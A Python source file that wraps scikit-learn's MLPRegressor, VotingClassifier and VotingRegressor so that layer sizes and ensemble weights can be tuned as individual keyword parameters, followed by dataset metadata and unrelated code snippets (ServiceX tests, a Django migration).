solver : {'lbfgs', 'sgd', 'adam'}, default='adam'
The solver for weight optimization.
- 'lbfgs' is an optimizer in the family of quasi-Newton methods.
- 'sgd' refers to stochastic gradient descent.
- 'adam' refers to a stochastic gradient-based optimizer proposed by
Kingma, Diederik, and Jimmy Ba
Note: The default solver 'adam' works pretty well on relatively
large datasets (with thousands of training samples or more) in terms of
both training time and validation score.
For small datasets, however, 'lbfgs' can converge faster and perform
better.
alpha : float, default=0.0001
L2 penalty (regularization term) parameter.
batch_size : int, default='auto'
Size of minibatches for stochastic optimizers.
If the solver is 'lbfgs', the classifier will not use minibatch.
When set to "auto", `batch_size=min(200, n_samples)`
learning_rate : {'constant', 'invscaling', 'adaptive'}, default='constant'
Learning rate schedule for weight updates.
- 'constant' is a constant learning rate given by
'learning_rate_init'.
- 'invscaling' gradually decreases the learning rate ``learning_rate_``
at each time step 't' using an inverse scaling exponent of 'power_t'.
effective_learning_rate = learning_rate_init / pow(t, power_t)
- 'adaptive' keeps the learning rate constant to
'learning_rate_init' as long as training loss keeps decreasing.
Each time two consecutive epochs fail to decrease training loss by at
least tol, or fail to increase validation score by at least tol if
'early_stopping' is on, the current learning rate is divided by 5.
Only used when solver='sgd'.
learning_rate_init : double, default=0.001
The initial learning rate used. It controls the step-size
in updating the weights. Only used when solver='sgd' or 'adam'.
power_t : double, default=0.5
The exponent for inverse scaling learning rate.
It is used in updating effective learning rate when the learning_rate
is set to 'invscaling'. Only used when solver='sgd'.
max_iter : int, default=200
Maximum number of iterations. The solver iterates until convergence
(determined by 'tol') or this number of iterations. For stochastic
solvers ('sgd', 'adam'), note that this determines the number of epochs
(how many times each data point will be used), not the number of
gradient steps.
shuffle : bool, default=True
Whether to shuffle samples in each iteration. Only used when
solver='sgd' or 'adam'.
random_state : int, RandomState instance, default=None
Determines random number generation for weights and bias
initialization, train-test split if early stopping is used, and batch
sampling when solver='sgd' or 'adam'.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
tol : float, default=1e-4
Tolerance for the optimization. When the loss or score is not improving
by at least ``tol`` for ``n_iter_no_change`` consecutive iterations,
unless ``learning_rate`` is set to 'adaptive', convergence is
considered to be reached and training stops.
verbose : bool, default=False
Whether to print progress messages to stdout.
warm_start : bool, default=False
When set to True, reuse the solution of the previous
call to fit as initialization, otherwise, just erase the
previous solution. See :term:`the Glossary <warm_start>`.
momentum : float, default=0.9
Momentum for gradient descent update. Should be between 0 and 1. Only
used when solver='sgd'.
nesterovs_momentum : boolean, default=True
Whether to use Nesterov's momentum. Only used when solver='sgd' and
momentum > 0.
early_stopping : bool, default=False
Whether to use early stopping to terminate training when validation
score is not improving. If set to true, it will automatically set
aside 10% of training data as validation and terminate training when
validation score is not improving by at least ``tol`` for
``n_iter_no_change`` consecutive epochs.
Only effective when solver='sgd' or 'adam'
validation_fraction : float, default=0.1
The proportion of training data to set aside as validation set for
early stopping. Must be between 0 and 1.
Only used if early_stopping is True
beta_1 : float, default=0.9
Exponential decay rate for estimates of first moment vector in adam,
should be in [0, 1). Only used when solver='adam'
beta_2 : float, default=0.999
Exponential decay rate for estimates of second moment vector in adam,
should be in [0, 1). Only used when solver='adam'
epsilon : float, default=1e-8
Value for numerical stability in adam. Only used when solver='adam'
n_iter_no_change : int, default=10
Maximum number of epochs to not meet ``tol`` improvement.
Only effective when solver='sgd' or 'adam'
.. versionadded:: 0.20
max_fun : int, default=15000
Only used when solver='lbfgs'. Maximum number of function calls.
The solver iterates until convergence (determined by 'tol'), number
of iterations reaches max_iter, or this number of function calls.
Note that number of function calls will be greater than or equal to
the number of iterations for the MLPRegressor.
.. versionadded:: 0.22
Attributes
----------
loss_ : float
The current loss computed with the loss function.
coefs_ : list, length n_layers - 1
The ith element in the list represents the weight matrix corresponding
to layer i.
intercepts_ : list, length n_layers - 1
The ith element in the list represents the bias vector corresponding to
layer i + 1.
n_iter_ : int,
The number of iterations the solver has ran.
n_layers_ : int
Number of layers.
n_outputs_ : int
Number of outputs.
out_activation_ : string
Name of the output activation function.
Examples
--------
>>> from sklearn.neural_network import MLPRegressor
>>> from sklearn.datasets import make_regression
>>> from sklearn.model_selection import train_test_split
>>> X, y = make_regression(n_samples=200, random_state=1)
>>> X_train, X_test, y_train, y_test = train_test_split(X, y,
... random_state=1)
>>> regr = MLPRegressor(random_state=1, max_iter=500).fit(X_train, y_train)
>>> regr.predict(X_test[:2])
array([-0.9..., -7.1...])
>>> regr.score(X_test, y_test)
0.4...
Notes
-----
MLPRegressor trains iteratively since at each time step
the partial derivatives of the loss function with respect to the model
parameters are computed to update the parameters.
It can also have a regularization term added to the loss function
that shrinks model parameters to prevent overfitting.
This implementation works with data represented as dense and sparse numpy
arrays of floating point values.
References
----------
Hinton, Geoffrey E.
"Connectionist learning procedures." Artificial intelligence 40.1
(1989): 185-234.
Glorot, Xavier, and Yoshua Bengio. "Understanding the difficulty of
training deep feedforward neural networks." International Conference
on Artificial Intelligence and Statistics. 2010.
He, Kaiming, et al. "Delving deep into rectifiers: Surpassing human-level
performance on imagenet classification." arXiv preprint
arXiv:1502.01852 (2015).
Kingma, Diederik, and Jimmy Ba. "Adam: A method for stochastic
optimization." arXiv preprint arXiv:1412.6980 (2014).
"""
def __init__(
self,
hidden_layer_sizes=None,
activation="relu",
*,
solver="adam",
alpha=0.0001,
batch_size="auto",
learning_rate="constant",
learning_rate_init=0.001,
power_t=0.5,
max_iter=200,
shuffle=True,
random_state=None,
tol=1e-4,
verbose=False,
warm_start=False,
momentum=0.9,
nesterovs_momentum=True,
early_stopping=False,
validation_fraction=0.1,
beta_1=0.9,
beta_2=0.999,
epsilon=1e-8,
n_iter_no_change=10,
max_fun=15000,
**kwargs,
):
self.hidden_layer_sizes = hidden_layer_sizes
self._hidden_layer_size_kwargs_to_hidden_layer_sizes(kwargs)
super().__init__(
hidden_layer_sizes=self.hidden_layer_sizes,
activation=activation,
solver=solver,
alpha=alpha,
batch_size=batch_size,
learning_rate=learning_rate,
learning_rate_init=learning_rate_init,
power_t=power_t,
max_iter=max_iter,
shuffle=shuffle,
random_state=random_state,
tol=tol,
verbose=verbose,
warm_start=warm_start,
momentum=momentum,
nesterovs_momentum=nesterovs_momentum,
early_stopping=early_stopping,
validation_fraction=validation_fraction,
beta_1=beta_1,
beta_2=beta_2,
epsilon=epsilon,
n_iter_no_change=n_iter_no_change,
max_fun=max_fun,
)
def _hidden_layer_size_kwargs_to_hidden_layer_sizes(self, kwargs):
if not self.hidden_layer_sizes:
self.hidden_layer_sizes = [100]
if not isinstance(self.hidden_layer_sizes, Iterable):
self.hidden_layer_sizes = [self.hidden_layer_sizes]
if not isinstance(self.hidden_layer_sizes, list):
self.hidden_layer_sizes = list(self.hidden_layer_sizes)
reset_layers = False
for k, v in kwargs.items():
if k.startswith("hidden_layer_size_") and not (
k in self.__dict__ and self.__dict__[k] == v
):
try:
hidden_layer_size = k.split("_")
hidden_layer_size = int(hidden_layer_size[3])
if v <= 0:
self.hidden_layer_sizes.pop(hidden_layer_size)
else:
if hidden_layer_size < len(self.hidden_layer_sizes):
self.hidden_layer_sizes[hidden_layer_size] = v
else:
self.hidden_layer_sizes = (
self.hidden_layer_sizes
+ [1]
* (hidden_layer_size - len(self.hidden_layer_sizes))
+ [v]
)
reset_layers = True
except:
pass
if reset_layers:
self._hidden_layer_sizes_to_hidden_layer_size_kwargs()
def _hidden_layer_sizes_to_hidden_layer_size_kwargs(self):
to_delete = []
for k, v in self.__dict__.items():
if k.startswith("hidden_layer_size_") and int(k.split("_")[3]) >= len(
self.hidden_layer_sizes
):
to_delete.append(k)
for k in to_delete:
delattr(self, k)
for i, w in enumerate(self.hidden_layer_sizes):
if not (
f"hidden_layer_size_{i}" in self.__dict__
and self.__dict__[f"hidden_layer_size_{i}"] == w
):
setattr(self, f"hidden_layer_size_{i}", w)
def set_params(self, **params):
"""
Set the parameters of this estimator.
The method works on simple estimators as well as on nested objects
(such as pipelines). The latter have parameters of the form
``<component>__<parameter>`` so that it's possible to update each
component of a nested object.
Parameters
----------
**params : dict
Estimator parameters.
Returns
-------
self : object
Estimator instance.
"""
self._hidden_layer_size_kwargs_to_hidden_layer_sizes(params)
super().set_params(
**{
k: v
for k, v in params.items()
if not k.startswith("hidden_layer_size_")
}
)
return self
def get_params(self, deep=True):
"""
Get parameters for this estimator.
Parameters
----------
deep : bool, default=True
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
r = super().get_params(deep=deep)
if self.hidden_layer_sizes:
for i, w in enumerate(self.hidden_layer_sizes):
if f"hidden_layer_size_{i}" not in r:
r[f"hidden_layer_size_{i}"] = w
return r
def fit(self, X, y, **fit_params):
"""Fit the model to data matrix X and target(s) y.
Parameters
----------
X : ndarray or sparse matrix of shape (n_samples, n_features)
The input data.
y : ndarray, shape (n_samples,) or (n_samples, n_outputs)
The target values (class labels in classification, real numbers in
regression).
Returns
-------
self : returns a trained MLP model.
"""
return super().fit(X, y)
def _partial_fit(self, X, y, **fit_params):
return super()._partial_fit(X, y)
class TunableVotingClassifier(VotingClassifier):
"""
A VotingClassifier with weights being kwargs instead of a list, allowing
for tuning.
The kwargs need to be in format ``weight_n``, where n is an integer corresponding
to the index of the estimator.
If ``weights`` parameter is changed with ``set_params()``, ``weight_n`` parameters
will change as well, and vice versa.
scikit-learn description below:
Soft Voting/Majority Rule classifier for unfitted estimators.
Parameters
----------
estimators : list of (str, estimator) tuples
Invoking the ``fit`` method on the ``VotingClassifier`` will fit clones
of those original estimators that will be stored in the class attribute
``self.estimators_``. An estimator can be set to ``'drop'``
using ``set_params``.
.. versionchanged:: 0.21
``'drop'`` is accepted.
.. deprecated:: 0.22
Using ``None`` to drop an estimator is deprecated in 0.22 and
support will be dropped in 0.24. Use the string ``'drop'`` instead.
voting : {'hard', 'soft'}, default='hard'
If 'hard', uses predicted class labels for majority rule voting.
Else if 'soft', predicts the class label based on the argmax of
the sums of the predicted probabilities, which is recommended for
an ensemble of well-calibrated classifiers.
weights : array-like of shape (n_classifiers,), default=None
Sequence of weights (`float` or `int`) to weight the occurrences of
predicted class labels (`hard` voting) or class probabilities
before averaging (`soft` voting). Uses uniform weights if `None`.
n_jobs : int, default=None
The number of jobs to run in parallel for ``fit``.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
.. versionadded:: 0.18
flatten_transform : bool, default=True
Affects shape of transform output only when voting='soft'
If voting='soft' and flatten_transform=True, transform method returns
matrix with shape (n_samples, n_classifiers * n_classes). If
flatten_transform=False, it returns
(n_classifiers, n_samples, n_classes).
verbose : bool, default=False
If True, the time elapsed while fitting will be printed as it
is completed.
**kwargs:
Weights in format ``weight_n`` where ``n`` is an integer corresponding
to the index of the estimator. Will overwrite ``weights``.
Attributes
----------
estimators_ : list of classifiers
The collection of fitted sub-estimators as defined in ``estimators``
that are not 'drop'.
named_estimators_ : :class:`~sklearn.utils.Bunch`
Attribute to access any fitted sub-estimators by name.
.. versionadded:: 0.20
classes_ : array-like of shape (n_predictions,)
The classes labels.
See Also
--------
VotingRegressor: Prediction voting regressor.
Examples
--------
>>> import numpy as np
>>> from sklearn.linear_model import LogisticRegression
>>> from sklearn.naive_bayes import GaussianNB
>>> from sklearn.ensemble import RandomForestClassifier, VotingClassifier
>>> clf1 = LogisticRegression(multi_class='multinomial', random_state=1)
>>> clf2 = RandomForestClassifier(n_estimators=50, random_state=1)
>>> clf3 = GaussianNB()
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> y = np.array([1, 1, 1, 2, 2, 2])
>>> eclf1 = VotingClassifier(estimators=[
... ('lr', clf1), ('rf', clf2), ('gnb', clf3)], voting='hard')
>>> eclf1 = eclf1.fit(X, y)
>>> print(eclf1.predict(X))
[1 1 1 2 2 2]
>>> np.array_equal(eclf1.named_estimators_.lr.predict(X),
... eclf1.named_estimators_['lr'].predict(X))
True
>>> eclf2 = VotingClassifier(estimators=[
... ('lr', clf1), ('rf', clf2), ('gnb', clf3)],
... voting='soft')
>>> eclf2 = eclf2.fit(X, y)
>>> print(eclf2.predict(X))
[1 1 1 2 2 2]
>>> eclf3 = VotingClassifier(estimators=[
... ('lr', clf1), ('rf', clf2), ('gnb', clf3)],
... voting='soft', weights=[2,1,1],
... flatten_transform=True)
>>> eclf3 = eclf3.fit(X, y)
>>> print(eclf3.predict(X))
[1 1 1 2 2 2]
>>> print(eclf3.transform(X).shape)
(6, 6)
"""
def __init__(
self,
estimators,
*,
voting="hard",
weights=None,
n_jobs=None,
flatten_transform=True,
verbose=False,
**kwargs,
):
self.weights = weights
self._weight_kwargs_to_weights(kwargs, estimators=estimators)
super().__init__(
estimators=estimators,
voting=voting,
weights=self.weights,
n_jobs=n_jobs,
flatten_transform=flatten_transform,
verbose=verbose,
)
def _weight_kwargs_to_weights(self, kwargs, estimators=None):
if estimators is None:
estimators = self.estimators
if not self.weights:
self.weights = [1 for x in estimators]
if len(self.weights) < len(estimators):
self.weights += [1] * (len(self.weights) - len(estimators))
for k, v in kwargs.items():
if k.startswith("weight_"):
try:
weight = k.split("_")
weight = int(weight[1])
self.weights[weight] = v
except:
pass
self._weights_to_weight_kwargs()
def _weights_to_weight_kwargs(self):
for i, w in enumerate(self.weights):
if not (
f"weight_{i}" in self.__dict__ and self.__dict__[f"weight_{i}"] == w
):
setattr(self, f"weight_{i}", w)
def set_params(self, **params):
"""
Set the parameters of an estimator from the ensemble.
Valid parameter keys can be listed with `get_params()`.
Parameters
----------
**params : keyword arguments
Specific parameters using e.g.
`set_params(parameter_name=new_value)`. In addition, to setting the
parameters of the stacking estimator, the individual estimator of
the stacking estimators can also be set, or can be removed by
setting them to 'drop'.
"""
super()._set_params("estimators", **params)
self._weight_kwargs_to_weights(params)
return self
def get_params(self, deep=True):
"""
Get the parameters of an estimator from the ensemble.
Parameters
----------
deep : bool, default=True
Setting it to True gets the various classifiers and the parameters
of the classifiers as well.
"""
r = super()._get_params("estimators", deep=deep)
if self.weights:
for i, w in enumerate(self.weights):
if f"weight_{i}" not in r:
r[f"weight_{i}"] = w
return r
class TunableVotingRegressor(VotingRegressor):
"""
A VotingRegressor with weights being kwargs instead of a list, allowing
for tuning.
The kwargs need to be in format ``weight_n``, where n is an integer corresponding
to the index of the estimator.
If ``weights`` parameter is changed with ``set_params()``, ``weight_n`` parameters
will change as well, and vice versa.
scikit-learn description below:
Prediction voting regressor for unfitted estimators.
.. versionadded:: 0.21
A voting regressor is an ensemble meta-estimator that fits several base
regressors, each on the whole dataset. Then it averages the individual
predictions to form a final prediction.
Read more in the :ref:`User Guide <voting_regressor>`.
Parameters
----------
estimators : list of (str, estimator) tuples
Invoking the ``fit`` method on the ``VotingRegressor`` will fit clones
of those original estimators that will be stored in the class attribute
``self.estimators_``. An estimator can be set to ``'drop'`` using
``set_params``.
.. versionchanged:: 0.21
``'drop'`` is accepted.
.. deprecated:: 0.22
Using ``None`` to drop an estimator is deprecated in 0.22 and
support will be dropped in 0.24. Use the string ``'drop'`` instead.
weights : array-like of shape (n_regressors,), default=None
Sequence of weights (`float` or `int`) to weight the occurrences of
predicted values before averaging. Uses uniform weights if `None`.
n_jobs : int, default=None
The number of jobs to run in parallel for ``fit``.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
verbose : bool, default=False
If True, the time elapsed while fitting will be printed as it
is completed.
Attributes
----------
estimators_ : list of regressors
The collection of fitted sub-estimators as defined in ``estimators``
that are not 'drop'.
named_estimators_ : Bunch
Attribute to access any fitted sub-estimators by name.
.. versionadded:: 0.20
See Also
--------
VotingClassifier: Soft Voting/Majority Rule classifier.
Examples
--------
>>> import numpy as np
>>> from sklearn.linear_model import LinearRegression
>>> from sklearn.ensemble import RandomForestRegressor
>>> from sklearn.ensemble import VotingRegressor
>>> r1 = LinearRegression()
>>> r2 = RandomForestRegressor(n_estimators=10, random_state=1)
>>> X = np.array([[1, 1], [2, 4], [3, 9], [4, 16], [5, 25], [6, 36]])
>>> y = np.array([2, 6, 12, 20, 30, 42])
>>> er = VotingRegressor([('lr', r1), ('rf', r2)])
>>> print(er.fit(X, y).predict(X))
[ 3.3 5.7 11.8 19.7 28. 40.3]
"""
def __init__(
self, estimators, *, weights=None, n_jobs=None, verbose=False, **kwargs,
):
self.weights = weights
self._weight_kwargs_to_weights(kwargs, estimators=estimators)
super().__init__(
estimators=estimators, weights=self.weights, n_jobs=n_jobs, verbose=verbose,
)
def _weight_kwargs_to_weights(self, kwargs, estimators=None):
if estimators is None:
estimators = self.estimators
if not self.weights:
self.weights = [1 for x in estimators]
if len(self.weights) < len(estimators):
self.weights += [1] * (len(self.weights) - len(estimators))
for k, v in kwargs.items():
if k.startswith("weight_"):
try:
weight = k.split("_")
weight = int(weight[1])
self.weights[weight] = v
except:
pass
self._weights_to_weight_kwargs()
def _weights_to_weight_kwargs(self):
for i, w in enumerate(self.weights):
if not (
f"weight_{i}" in self.__dict__ and self.__dict__[f"weight_{i}"] == w
):
setattr(self, f"weight_{i}", w)
def set_params(self, **params):
"""
Set the parameters of an estimator from the ensemble.
Valid parameter keys can be listed with `get_params()`.
Parameters
----------
**params : keyword arguments
Specific parameters using e.g.
`set_params(parameter_name=new_value)`. In addition, to setting the
parameters of the stacking estimator, the individual estimator of
the stacking estimators can also be set, or can be removed by
setting them to 'drop'.
"""
super()._set_params("estimators", **params)
self._weight_kwargs_to_weights(params)
return self
def get_params(self, deep=True):
"""
Get the parameters of an estimator from the ensemble.
Parameters
----------
deep : bool, default=True
Setting it to True gets the various classifiers and the parameters
of the classifiers as well.
"""
r = super()._get_params("estimators", deep=deep)
if self.weights:
for i, w in enumerate(self.weights):
if f"weight_{i}" not in r:
r[f"weight_{i}"] = w
return r
| 36.515625
| 97
| 0.614395
| 5,549
| 44,403
| 4.769868
| 0.113174
| 0.047378
| 0.038688
| 0.033248
| 0.882802
| 0.873016
| 0.862022
| 0.859906
| 0.855901
| 0.853975
| 0
| 0.017075
| 0.298313
| 44,403
| 1,215
| 98
| 36.545679
| 0.832429
| 0.631241
| 0
| 0.903134
| 0
| 0
| 0.03923
| 0.015782
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068376
| false
| 0.011396
| 0.011396
| 0.005698
| 0.125356
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4c335a075081c7f5e7cee274ed8b013fd35838bd
| 41
|
py
|
Python
|
code/sample_4-3-18.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | 1
|
2022-03-29T13:50:12.000Z
|
2022-03-29T13:50:12.000Z
|
code/sample_4-3-18.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | null | null | null |
code/sample_4-3-18.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | null | null | null |
x = [1, 2, 3, 4, 3, 5]
print(x.count(3))
| 13.666667
| 22
| 0.463415
| 11
| 41
| 1.727273
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.21875
| 0.219512
| 41
| 2
| 23
| 20.5
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
4c4462f40e3c1f9a11b3f298d2c8a95797a3fb50
| 6,102
|
py
|
Python
|
tests/resources/test_transformation_request.py
|
zorache/ServiceX_App
|
4479afa0f019bbdcd35812691e78abba442c9d37
|
[
"BSD-3-Clause"
] | null | null | null |
tests/resources/test_transformation_request.py
|
zorache/ServiceX_App
|
4479afa0f019bbdcd35812691e78abba442c9d37
|
[
"BSD-3-Clause"
] | null | null | null |
tests/resources/test_transformation_request.py
|
zorache/ServiceX_App
|
4479afa0f019bbdcd35812691e78abba442c9d37
|
[
"BSD-3-Clause"
] | null | null | null |
from tests.resource_test_base import ResourceTestBase
class TestTransformationRequest(ResourceTestBase):
def test_get_single_request_no_object_store(self, mocker):
import servicex
mock_transform_request_read = mocker.patch.object(
servicex.models.TransformRequest,
'return_request',
return_value=self._generate_transform_request())
client = self._test_client(extra_config={'OBJECT_STORE_ENABLED': False})
response = client.get('/servicex/transformation/1234')
assert response.status_code == 200
assert response.json == {'request_id': 'BR549', 'did': '123-456-789',
'columns': 'electron.eta(), muon.pt()',
'selection': None,
'tree-name': "Events",
'image': 'ssl-hep/foo:latest', 'chunk-size': 1000,
'workers': 42, 'result-destination': 'kafka',
'result-format': 'arrow',
'kafka-broker': 'http://ssl-hep.org.kafka:12345',
'workflow-name': None,
'generated-code-cm': None,
'status': "Submitted",
'failure-info': None,
'app-version': "1.0.1",
'code-gen-image': 'sslhep/servicex_code_gen_func_adl_xaod:develop'
}
mock_transform_request_read.assert_called_with('1234')
def test_get_single_request_with_object_store(self, mocker):
import servicex
object_store_transform_request = self._generate_transform_request()
object_store_transform_request.result_destination = 'object-store'
mock_transform_request_read = mocker.patch.object(
servicex.models.TransformRequest,
'return_request',
return_value=object_store_transform_request)
local_config = {
'OBJECT_STORE_ENABLED': True,
'MINIO_PUBLIC_URL': 'minio.servicex.com:9000',
'MINIO_SECURED': True,
'MINIO_ACCESS_KEY': 'miniouser',
'MINIO_SECRET_KEY': 'leftfoot1'
}
client = self._test_client(extra_config=local_config)
response = client.get('/servicex/transformation/1234')
assert response.status_code == 200
print(response.json)
assert response.json == {'request_id': 'BR549', 'did': '123-456-789',
'columns': 'electron.eta(), muon.pt()',
'selection': None,
'tree-name': "Events",
'image': 'ssl-hep/foo:latest', 'chunk-size': 1000,
'kafka-broker': 'http://ssl-hep.org.kafka:12345',
'workers': 42, 'result-destination': 'object-store',
'result-format': 'arrow',
'minio-endpoint': 'minio.servicex.com:9000',
'minio-secured': True,
'minio-access-key': 'miniouser',
'minio-secret-key': 'leftfoot1',
'workflow-name': None,
'generated-code-cm': None,
'status': "Submitted",
'failure-info': None,
'app-version': "1.0.1",
'code-gen-image': 'sslhep/servicex_code_gen_func_adl_xaod:develop'
}
mock_transform_request_read.assert_called_with('1234')
def test_get_single_request_to_kafka(self, mocker, mock_rabbit_adaptor):
import servicex
kafka_transform_request = self._generate_transform_request()
kafka_transform_request.result_destination = 'kafka'
mock_transform_request_read = mocker.patch.object(
servicex.models.TransformRequest,
'return_request',
return_value=kafka_transform_request)
local_config = {
'OBJECT_STORE_ENABLED': True,
'MINIO_PUBLIC_URL': 'minio.servicex.com:9000',
'MINIO_ACCESS_KEY': 'miniouser',
'MINIO_SECRET_KEY': 'leftfoot1'
}
client = self._test_client(extra_config=local_config)
response = client.get('/servicex/transformation/1234')
assert response.status_code == 200
assert response.json == {'request_id': 'BR549', 'did': '123-456-789',
'columns': 'electron.eta(), muon.pt()',
'selection': None,
'tree-name': "Events",
'image': 'ssl-hep/foo:latest', 'chunk-size': 1000,
'kafka-broker': 'http://ssl-hep.org.kafka:12345',
'workers': 42, 'result-destination': 'kafka',
'result-format': 'arrow',
'workflow-name': None,
'generated-code-cm': None,
'status': "Submitted",
'failure-info': None,
'app-version': "1.0.1",
'code-gen-image': 'sslhep/servicex_code_gen_func_adl_xaod:develop'
}
mock_transform_request_read.assert_called_with('1234')
def test_get_single_request_404(self, mocker, client):
import servicex
mock_transform_request_read = mocker.patch.object(
servicex.models.TransformRequest, 'return_request',
return_value=None)
response = client.get('/servicex/transformation/1234')
assert response.status_code == 404
mock_transform_request_read.assert_called_with('1234')
| 50.85
| 99
| 0.511308
| 540
| 6,102
| 5.509259
| 0.209259
| 0.091429
| 0.053782
| 0.064538
| 0.861513
| 0.853782
| 0.794958
| 0.794958
| 0.74521
| 0.74521
| 0
| 0.037057
| 0.380859
| 6,102
| 119
| 100
| 51.277311
| 0.750397
| 0
| 0
| 0.728972
| 0
| 0
| 0.259915
| 0.052933
| 0
| 0
| 0
| 0
| 0.102804
| 1
| 0.037383
| false
| 0
| 0.046729
| 0
| 0.093458
| 0.009346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4c5bb0100771f81a5ee451b7a22e4f2485a69c57
| 2,657
|
py
|
Python
|
bvspca/core/migrations/0034_auto_20180412_1059.py
|
rds0751/bvspca
|
f80eb90938f9db81d5c72a25aaa98869bbd6663a
|
[
"MIT"
] | 10
|
2019-02-25T07:06:09.000Z
|
2022-03-23T08:12:06.000Z
|
bvspca/core/migrations/0034_auto_20180412_1059.py
|
rds0751/bvspca
|
f80eb90938f9db81d5c72a25aaa98869bbd6663a
|
[
"MIT"
] | 18
|
2021-03-08T18:38:04.000Z
|
2021-08-20T14:16:37.000Z
|
bvspca/core/migrations/0034_auto_20180412_1059.py
|
rds0751/bvspca
|
f80eb90938f9db81d5c72a25aaa98869bbd6663a
|
[
"MIT"
] | 3
|
2019-01-29T05:14:22.000Z
|
2021-02-18T11:58:34.000Z
|
# Generated by Django 2.0.4 on 2018-04-12 16:59
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('core', '0033_auto_20180403_1426'),
]
operations = [
migrations.AlterField(
model_name='teampage',
name='group1_members',
field=wagtail.core.fields.StreamField((('member', wagtail.core.blocks.StructBlock((('name', wagtail.core.blocks.CharBlock(max_length=50)), ('role', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('role_since', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('location', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('pets', wagtail.core.blocks.CharBlock(max_length=200, required=False)), ('bio', wagtail.core.blocks.RichTextBlock(required=False)), ('photo', wagtail.images.blocks.ImageChooserBlock(help_text='Image should be at least 350px x 350px', required=False))))),), blank=True, verbose_name='members'),
),
migrations.AlterField(
model_name='teampage',
name='group2_members',
field=wagtail.core.fields.StreamField((('member', wagtail.core.blocks.StructBlock((('name', wagtail.core.blocks.CharBlock(max_length=50)), ('role', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('role_since', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('location', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('pets', wagtail.core.blocks.CharBlock(max_length=200, required=False)), ('bio', wagtail.core.blocks.RichTextBlock(required=False)), ('photo', wagtail.images.blocks.ImageChooserBlock(help_text='Image should be at least 350px x 350px', required=False))))),), blank=True, verbose_name='members'),
),
migrations.AlterField(
model_name='teampage',
name='group3_members',
field=wagtail.core.fields.StreamField((('member', wagtail.core.blocks.StructBlock((('name', wagtail.core.blocks.CharBlock(max_length=50)), ('role', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('role_since', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('location', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('pets', wagtail.core.blocks.CharBlock(max_length=200, required=False)), ('bio', wagtail.core.blocks.RichTextBlock(required=False)), ('photo', wagtail.images.blocks.ImageChooserBlock(help_text='Image should be at least 350px x 350px', required=False))))),), blank=True, verbose_name='members'),
),
]
| 83.03125
| 671
| 0.717727
| 328
| 2,657
| 5.713415
| 0.207317
| 0.152615
| 0.199573
| 0.208111
| 0.877268
| 0.877268
| 0.85539
| 0.85539
| 0.85539
| 0.85539
| 0
| 0.036278
| 0.118178
| 2,657
| 31
| 672
| 85.709677
| 0.763551
| 0.016936
| 0
| 0.48
| 1
| 0
| 0.137931
| 0.008812
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.16
| 0
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4c68b2aa431206eaadff8f0a127bacbd657080e2
| 32,492
|
py
|
Python
|
gsd/test/test_fl.py
|
mgorny/gsd
|
4c544c412f1a65a8800e8169af044d32201bd985
|
[
"BSD-2-Clause"
] | 2
|
2016-06-05T20:24:19.000Z
|
2018-12-06T02:05:37.000Z
|
gsd/test/test_fl.py
|
mgorny/gsd
|
4c544c412f1a65a8800e8169af044d32201bd985
|
[
"BSD-2-Clause"
] | null | null | null |
gsd/test/test_fl.py
|
mgorny/gsd
|
4c544c412f1a65a8800e8169af044d32201bd985
|
[
"BSD-2-Clause"
] | 1
|
2016-11-30T04:13:55.000Z
|
2016-11-30T04:13:55.000Z
|
# Copyright (c) 2016-2021 The Regents of the University of Michigan
